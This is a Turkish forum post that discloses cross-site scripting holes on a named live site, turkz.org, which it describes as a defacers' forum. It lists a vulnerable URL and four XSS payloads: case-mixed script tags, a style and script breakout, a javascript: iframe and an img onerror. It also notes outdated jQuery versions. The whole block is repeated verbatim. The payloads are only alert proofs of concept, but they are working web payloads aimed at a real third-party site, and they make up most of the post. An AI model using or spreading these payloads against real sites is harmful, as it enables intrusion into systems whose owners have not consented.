Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.
URL: http://www.turkz.org/misyon-vizyon.html
Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]
Sonuncusunda id bölümü path'tir.
Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş
----------------------------------------------------------------------------------------
Bu arada AYT'nin temasını kopyalamışlar.
URL: http://www.turkz.org/misyon-vizyon.html
Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]
Sonuncusunda id bölümü path'tir.
Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş
----------------------------------------------------------------------------------------
Bu arada AYT'nin temasını kopyalamışlar.
Last edited: